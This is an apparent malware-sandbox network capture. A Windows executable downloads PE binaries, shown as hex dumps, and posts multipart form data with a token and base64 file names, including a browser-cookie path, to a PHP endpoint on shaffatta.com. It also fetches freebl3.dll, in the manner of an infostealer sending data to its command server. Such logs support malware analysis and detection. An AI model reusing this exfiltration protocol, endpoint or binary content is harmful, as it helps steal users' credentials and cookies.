2024-05-03 00:08:27 UTC	16096	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *
2024-05-03 00:08:27 UTC	16384	IN	Data Raw: ff ff ff 45 e4 eb dd 83 c4 1c 5b 5e 5f 5d c3 55 89 e5 57 56 53 89 d6 89 c3 83 ec 1c 89 4d e0 85 db 0f 84 80 00 00 00 85 f6 8b 43 04 78 09 a8 01 74 12 3b 73 24 75 0d 83 e0 fc 85 f6 78 03 83 c8 02 89 43 04 8a 03 3c a7 75 14 39 73 1c 75 43 83 7d e0 00 75 3d 81 63 04 ff ff df ff eb 34 3c ac 75 30 83 7b 14 00 74 2a c7 45 e4 00 00 00 00 8b 43 14 8b 4d e4 3b 08 7d 19 6b 55 e4 14 8b 4d e0 89 d7 89 f2 8b 44 38 08 e8 82 ff ff ff ff 45 e4 eb dd 8b 43 0c 8b 4d e0 89 f2 e8 70 ff ff ff 8b 5b 10 e9 78 ff ff ff 83 c4 1c 5b 5e 5f 5d c3 55 89 e5 57 56 53 8d 59 08 89 d6 83 ec 2c 89 45 e0 89 4d dc c7 45 e4 00 00 00 00 8b 45 dc 8b 55 e4 3b 10 7d 5a 8b 45 e4 3b 45 08 75 08 ff 45 e4 83 c3 48 eb e6 f6 43 28 40 8b 43 2c 74 07 83 7c 86 04 00 75 10 8b 7d e0 8b 57 28 8d 4a 01 89 4f Data Ascii: E[^_]UWVSMCxt;s$uxC<u9suC}u=c4<u0{t*ECM;}kUMD8ECMp[x[^_]UWVSY,EMEEU;}ZE;EuEHC(@C,t\|u}W(JO
2024-05-03 00:08:27 UTC	16384	IN	Data Raw: c4 0c 31 c0 5b 5e 5f 5d c3 55 89 e5 8b 45 08 5d 8b 40 0c c3 55 89 e5 53 8b 45 08 8b 58 34 8b 48 30 8b 45 0c 89 08 89 58 04 31 c0 5b 5d c3 55 b8 9a 71 eb 61 89 e5 5d c3 55 89 e5 8b 45 08 c7 80 38 01 00 00 01 00 00 00 5d c3 55 31 c0 89 e5 57 56 53 8d 75 d8 83 ec 3c 8b 5d 0c 8b 55 10 c7 45 d4 00 00 00 00 c7 45 d0 00 00 00 00 89 d7 89 d9 89 55 c8 f3 aa 89 5d cc 89 34 24 ff 15 20 62 eb 61 50 8d 45 c8 89 f2 b9 10 00 00 00 e8 cc 97 ff ff ff 15 90 61 eb 61 89 45 d8 8d 45 c8 89 f2 b9 04 00 00 00 e8 b4 97 ff ff ff 15 50 62 eb 61 89 45 d8 8d 45 c8 89 f2 b9 04 00 00 00 e8 9c 97 ff ff 89 34 24 ff 15 28 63 eb 61 8d 45 c8 52 b9 08 00 00 00 89 f2 e8 83 97 ff ff 39 5d d4 89 d8 0f 4e 45 d4 8d 65 f4 5b 5e 5f 5d c3 55 89 e5 57 56 53 89 cb 83 ec 1c 89 55 e0 8b 51 04 89 45 e4 Data Ascii: 1[^_]UE]@USEX4H0EX1[]Uqa]UE8]U1WVSu<]UEEU]4$ baPEaaEEPbaEE4$(caER9]NEe[^_]UWVSUQE
2024-05-03 00:08:27 UTC	16384	IN	Data Raw: 07 04 85 c0 74 05 e8 66 ff ff ff 43 eb d0 83 c4 1c 5b 5e 5f 5d c3 83 b8 a0 00 00 00 00 55 89 e5 74 03 5d eb a1 5d c3 55 89 e5 85 c0 74 09 80 60 01 fb 8b 40 18 eb f3 5d c3 8b 10 85 d2 74 1a 55 89 e5 53 89 c3 8d 42 fc 51 89 03 e8 c2 fa ff ff c7 03 00 00 00 00 5b 5b 5d c3 8b 50 10 f6 c2 24 74 06 8b 50 04 8b 00 c3 f6 c2 08 74 12 55 89 e5 83 ec 08 dd 00 dd 1c 24 e8 ff 6a ff ff c9 c3 80 e2 12 74 0b 83 78 08 00 74 05 e9 44 6b ff ff 31 c0 31 d2 c3 55 89 e5 53 52 89 c3 e8 ba ff ff ff 89 03 8b 43 10 89 53 04 66 25 40 f2 83 c8 04 66 89 43 10 31 c0 59 5b 5d c3 55 89 e5 8b 45 08 e8 96 ff ff ff 5d c3 55 89 e5 8b 45 08 5d eb 8b 8b 50 04 39 10 7e 17 55 89 e5 53 8d 5a 01 8b 48 08 89 58 04 5b 5d 8b 04 91 e9 6d ff ff ff 31 c0 31 d2 c3 55 89 e5 57 56 53 31 f6 83 ec 0c 8b 7a Data Ascii: tfC[^_]Ut]]Ut`@]tUSBQ[[]P$tPtU$jtxtDk11USRCSf%@fC1Y[]UE]UE]P9~USZHX[]m11UWVS1z
2024-05-03 00:08:27 UTC	16384	IN	Data Raw: 5d c4 89 de 76 ed 8b 7d 08 83 3f 00 74 07 31 d2 e8 ae fe ff ff 83 f8 7f 77 0b 88 45 c8 8d 4d c9 e9 80 00 00 00 3d ff 07 00 00 89 c2 77 17 c1 ea 06 83 e0 3f 8d 4d ca 83 ea 40 83 c0 80 88 55 c8 88 45 c9 eb 60 3d ff ff 00 00 77 25 c1 ea 0c 8d 4d cb 83 ea 20 88 55 c8 89 c2 83 e0 3f c1 ea 06 83 c0 80 83 e2 3f 88 45 ca 83 c2 80 88 55 c9 eb 34 c1 ea 12 8d 4d cc 83 e2 07 83 ea 10 88 55 c8 89 c2 c1 ea 0c 83 e2 3f 83 c2 80 88 55 c9 89 c2 83 e0 3f c1 ea 06 83 c0 80 83 e2 3f 88 45 cb 83 c2 80 88 55 ca 0f b6 03 8d 7b 01 3d bf 00 00 00 76 57 0f b6 80 40 9e ec 61 3b 7d c4 75 0b 83 f8 7f 0f 86 2d 02 00 00 eb 17 8a 17 88 d3 83 e3 c0 80 fb 80 75 e9 c1 e0 06 83 e2 3f 47 01 d0 eb d9 89 c2 81 e2 00 f8 ff ff 81 fa 00 d8 00 00 0f 84 00 02 00 00 89 c2 83 e2 fe 81 fa fe ff 00 00 Data Ascii: ]v}?t1wEM=w?M@UE`=w%M U??EU4MU?U??EU{=vW@a;}u-u?G
2024-05-03 00:08:28 UTC	16384	IN	Data Raw: 2c c7 44 24 14 00 00 00 00 c7 44 24 10 00 00 00 00 c7 44 24 0c ff ff ff ff 89 44 24 08 c7 44 24 04 00 00 00 00 c7 04 24 e9 fd 00 00 ff 15 1c 63 eb 61 83 ec 18 85 c0 74 4c 89 c6 8d 04 00 31 d2 e8 91 ff ff ff 85 c0 89 c3 74 3a 89 74 24 14 89 44 24 10 c7 44 24 0c ff ff ff ff 89 7c 24 08 c7 44 24 04 00 00 00 00 c7 04 24 e9 fd 00 00 ff 15 1c 63 eb 61 83 ec 18 85 c0 89 da 75 0a 89 1c 24 e8 9e 64 ff ff 31 d2 8d 65 f4 89 d0 5b 5e 5f 5d c3 55 89 e5 57 56 53 89 c7 83 ec 2c c7 44 24 1c 00 00 00 00 c7 44 24 18 00 00 00 00 c7 44 24 14 00 00 00 00 c7 44 24 10 00 00 00 00 c7 44 24 0c ff ff ff ff 89 44 24 08 c7 44 24 04 00 00 00 00 c7 04 24 e9 fd 00 00 ff 15 94 63 eb 61 83 ec 20 85 c0 74 58 99 89 c6 e8 ea fe ff ff 85 c0 89 c3 74 4a c7 44 24 1c 00 00 00 00 c7 44 24 18 00 Data Ascii: ,D$D$D$D$D$$catL1t:t$D$D$\|$D$$cau$d1e[^_]UWVS,D$D$D$D$D$D$D$$ca tXtJD$D$
2024-05-03 00:08:28 UTC	16384	IN	Data Raw: 3c e8 71 2d ff ff 85 f6 c7 43 3c 00 00 00 00 c7 43 30 00 00 00 00 75 59 80 7b 0f 00 8b bb e4 00 00 00 75 20 80 7b 0c 00 74 1a 83 7d cc 00 74 1d 8b 43 40 83 38 00 74 15 89 f8 e8 3d 9e fe ff 83 f8 18 7e 09 89 f8 e8 af 3a ff ff eb 16 8b 07 85 c0 74 0a 66 83 60 1c f3 8b 40 20 eb f2 8b 47 04 89 47 08 8b 53 1c 8b 83 e4 00 00 00 e8 f8 01 ff ff 8b bb e8 00 00 00 85 ff 74 25 80 7f 2c 00 74 3a b9 01 00 00 00 31 d2 89 f8 e8 c5 3e ff ff c6 47 2c 00 c7 47 68 00 00 00 00 c6 47 2f 00 eb 1b 85 f6 75 17 83 7d cc 00 74 11 8b 53 1c 39 53 24 76 09 89 d8 e8 a8 00 ff ff 89 c6 85 f6 75 22 83 7d cc 00 74 1c 8b 43 40 31 c9 ba 16 00 00 00 e8 be 8b fe ff 89 c6 83 f8 0c b8 00 00 00 00 0f 44 f0 80 7b 04 00 74 04 31 c0 eb 4d 8b bb e8 00 00 00 85 ff 75 0e ba 01 00 00 00 89 d8 e8 8e 9f Data Ascii: <q-C<C0uY{u {t}tC@8t=~:tf`@ GGSt%,t:1>G,GhG/u}tS9S$vu"}tC@1D{t1Mu
2024-05-03 00:08:28 UTC	16384	IN	Data Raw: 66 c7 47 08 01 00 8b 45 e4 e8 ea 72 fe ff 89 07 8b 45 e0 8d 57 0c 89 5f 04 b9 09 00 00 00 66 89 47 0a 31 c0 89 d7 f3 ab 83 c4 2c 89 f0 5b 5e 5f 5d c3 55 89 e5 57 56 53 89 c3 89 d0 83 ec 1c 89 55 e4 e8 b1 72 fe ff 85 c0 88 4b 08 74 38 3a 08 89 c6 74 13 8b 55 e4 83 c4 1c 89 d8 5b 5e 5f 5d 31 c9 e9 05 ff ff ff 8b 50 0c 0f b6 f9 89 d8 89 f9 e8 bc ff ff ff 8b 56 10 83 c4 1c 89 f9 89 d8 5b 5e 5f 5d eb ac 83 c4 1c 5b 5e 5f 5d c3 f6 41 1c 08 0f 84 b6 00 00 00 55 89 e5 57 56 53 89 c7 83 ec 1c 8b 00 f6 40 18 04 75 37 8b 77 74 89 d3 85 f6 0f 44 f7 c1 e3 04 03 58 10 8b 5b 0c 8b 5b 48 85 db 74 13 f6 43 1c 80 75 0d 80 7b 2b 01 74 07 66 83 7b 22 02 74 0e ff 47 24 c7 47 0c 0b 02 00 00 31 c0 eb 60 8b 5e 70 85 db 74 09 3b 4b 04 74 51 8b 1b eb f3 89 4d e0 89 55 e4 31 c9 ba Data Ascii: fGErEW_fG1,[^_]UWVSUrKt8:tU[^_]1PV[^_][^_]AUWVS@u7wtDX[[HtCu{+tf{"tG$G1`^pt;KtQMU1
2024-05-03 00:08:28 UTC	16384	IN	Data Raw: 06 e8 94 c2 ff ff 85 c0 74 27 8b 57 2c 8b 4d e4 89 50 1c 8b 57 10 81 48 04 00 00 20 00 66 89 48 20 89 c1 89 50 2c 8b 13 89 f0 e8 60 ff ff ff 89 03 83 c4 2c 5b 5e 5f 5d c3 55 89 e5 57 56 53 89 d7 83 ec 2c 0f b7 19 8b 75 08 8b 12 66 85 db 74 0a 85 d2 74 14 39 1a 7c 0b eb 21 85 d2 bb 01 00 00 00 74 0a 8b 1a 43 eb 05 bb 01 00 00 00 66 89 19 89 f1 e8 17 ff ff ff 89 07 eb 2d 4b 89 4d e0 89 55 e4 6b db 14 8b 5c 1a 08 89 5c 24 04 8b 00 89 04 24 e8 16 5c ff ff 8b 4d e0 8b 55 e4 0f b7 01 48 6b c0 14 89 74 02 08 83 c4 2c 5b 5e 5f 5d c3 55 89 e5 57 56 53 89 ce 83 ec 2c 8b b8 ec 00 00 00 8b 08 85 ff 0f 84 8a 00 00 00 80 b8 d0 00 00 00 01 89 c3 74 7f 0f b6 81 b0 00 00 00 c1 e0 04 03 41 10 8b 40 04 8b 40 04 f6 40 18 01 75 66 89 d1 8b 57 10 89 d8 46 e8 92 fe ff ff 83 7b Data Ascii: t'W,MPWH fH P,`,[^_]UWVS,uftt9\|!tCf-KMUk\\$$\MUHkt,[^_]UWVS,tA@@@ufWF{
2024-05-03 00:08:28 UTC	16384	IN	Data Raw: 1c 83 79 04 00 8b 38 74 48 80 bf b1 00 00 00 00 89 d3 89 c6 74 12 c7 44 24 04 58 7a eb 61 89 04 24 e8 b0 5e ff ff eb 24 8b 45 08 89 08 89 f8 e8 83 6d ff ff 85 c0 79 25 89 5c 24 08 c7 44 24 04 69 7a eb 61 89 34 24 e8 8a 5e ff ff 83 c8 ff eb 0c 8b 5d 08 0f b6 87 b0 00 00 00 89 13 83 c4 1c 5b 5e 5f 5d c3 55 89 e5 57 56 53 89 d3 89 cf 83 ec 2c 8b 52 2c 8b 30 8d 0c 95 08 00 00 00 83 c2 03 3b 96 80 00 00 00 7c 1c 8b 13 c7 44 24 04 7d 7a eb 61 89 04 24 89 4d e4 89 54 24 08 e8 34 5e ff ff 8b 4d e4 8b 53 30 89 0c 24 89 f0 c7 44 24 04 00 00 00 00 e8 84 88 ff ff 85 c0 75 0e 89 7c 24 04 89 34 24 e8 36 65 fe ff eb 17 8b 53 2c 8d 4a 01 89 4b 2c 89 3c 90 c7 44 90 04 00 00 00 00 89 43 30 83 c4 2c 5b 5e 5f 5d c3 8b 90 fc 00 00 00 85 d2 74 3d 83 b8 ec 00 00 00 00 74 34 55 Data Ascii: y8tHtD$Xza$^$Emy%\$D$iza4$^][^_]UWVS,R,0;\|D$}za$MT$4^MS0$D$u\|$4$6eS,JK,<DC0,[^_]t=t4U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49737	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:30 UTC	200	OUT	POST /fdca69ae739b4897.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FHJEGIIEGIDGIDHJDAKF Host: shaffatta.com Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache
2024-05-03 00:08:30 UTC	751	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 48 4a 45 47 49 49 45 47 49 44 47 49 44 48 4a 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 65 62 31 32 32 31 61 63 34 64 34 65 35 33 37 31 61 32 61 31 65 35 63 31 62 36 32 30 32 31 62 32 33 64 66 35 37 61 62 30 32 38 65 63 32 34 64 32 39 62 34 35 61 65 30 62 30 30 36 39 33 63 33 61 64 39 61 36 35 36 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 45 47 49 49 45 47 49 44 47 49 44 48 4a 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 Data Ascii: ------FHJEGIIEGIDGIDHJDAKFContent-Disposition: form-data; name="token"b2eb1221ac4d4e5371a2a1e5c1b62021b23df57ab028ec24d29b45ae0b00693c3ad9a656------FHJEGIIEGIDGIDHJDAKFContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb
2024-05-03 00:08:31 UTC	181	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:08:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Served-By: shaffatta.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49738	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:31 UTC	200	OUT	POST /fdca69ae739b4897.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHDHIDGHIDGIECBKKJJ Host: shaffatta.com Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache
2024-05-03 00:08:31 UTC	359	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 65 62 31 32 32 31 61 63 34 64 34 65 35 33 37 31 61 32 61 31 65 35 63 31 62 36 32 30 32 31 62 32 33 64 66 35 37 61 62 30 32 38 65 63 32 34 64 32 39 62 34 35 61 65 30 62 30 30 36 39 33 63 33 61 64 39 61 36 35 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d Data Ascii: ------DGHDHIDGHIDGIECBKKJJContent-Disposition: form-data; name="token"b2eb1221ac4d4e5371a2a1e5c1b62021b23df57ab028ec24d29b45ae0b00693c3ad9a656------DGHDHIDGHIDGIECBKKJJContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl---
2024-05-03 00:08:32 UTC	181	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:08:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Served-By: shaffatta.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49739	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:32 UTC	200	OUT	POST /fdca69ae739b4897.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAAAAFBKFIECAAKECGCA Host: shaffatta.com Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache
2024-05-03 00:08:32 UTC	359	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 65 62 31 32 32 31 61 63 34 64 34 65 35 33 37 31 61 32 61 31 65 35 63 31 62 36 32 30 32 31 62 32 33 64 66 35 37 61 62 30 32 38 65 63 32 34 64 32 39 62 34 35 61 65 30 62 30 30 36 39 33 63 33 61 64 39 61 36 35 36 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d Data Ascii: ------CAAAAFBKFIECAAKECGCAContent-Disposition: form-data; name="token"b2eb1221ac4d4e5371a2a1e5c1b62021b23df57ab028ec24d29b45ae0b00693c3ad9a656------CAAAAFBKFIECAAKECGCAContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl---
2024-05-03 00:08:33 UTC	181	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:08:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Served-By: shaffatta.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49740	168.119.248.46	443	6488	C:\Users\user\Desktop\c4RAHq3BNl.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-03 00:08:34 UTC	92	OUT	GET /d32e011d2eaa85a0/freebl3.dll HTTP/1.1 Host: shaffatta.com Cache-Control: no-cache
2024-05-03 00:08:34 UTC	286	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 03 May 2024 00:08:34 GMT Content-Type: application/x-msdos-program Content-Length: 685392 Connection: close Last-Modified: Mon, 05 Sep 2022 08:49:08 GMT ETag: "a7550-5e7ea271b0900" Accept-Ranges: bytes X-Served-By: shaffatta.com
2024-05-03 00:08:34 UTC	16098	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
2024-05-03 00:08:34 UTC	16384	IN	Data Raw: c8 89 d9 31 d1 89 c3 0f a4 cb 08 0f a4 c1 08 89 4d 8c 8b 45 b4 03 85 0c ff ff ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 Data Ascii: 1MEE}1M1XM}}UU1M1UM] EH]EE\|1E1EMMuuU1M1Mu]uM11U\|uuM
2024-05-03 00:08:34 UTC	16384	IN	Data Raw: dc d1 c2 31 d1 c1 c1 08 31 ce 89 b0 94 00 00 00 8b 55 cc 8b 75 90 31 f2 c1 c2 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 Data Ascii: 11Uu11M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwj
2024-05-03 00:08:34 UTC	16384	IN	Data Raw: 8d 47 08 89 45 dc 89 d6 89 cf ff 15 00 80 0a 10 56 53 ff 75 dc ff d1 8b 7d 08 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 Data Ascii: GEVSu}00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M0
2024-05-03 00:08:34 UTC	16384	IN	Data Raw: 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 f0 33 0c b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 Data Ascii: p73p33p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;
2024-05-03 00:08:35 UTC	16384	IN	Data Raw: 89 45 ac 89 38 c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 Data Ascii: E8EEEEEPZ}EPYEPYEPYFMPQW\|EppEPH[FMPQuo=EppEPN@
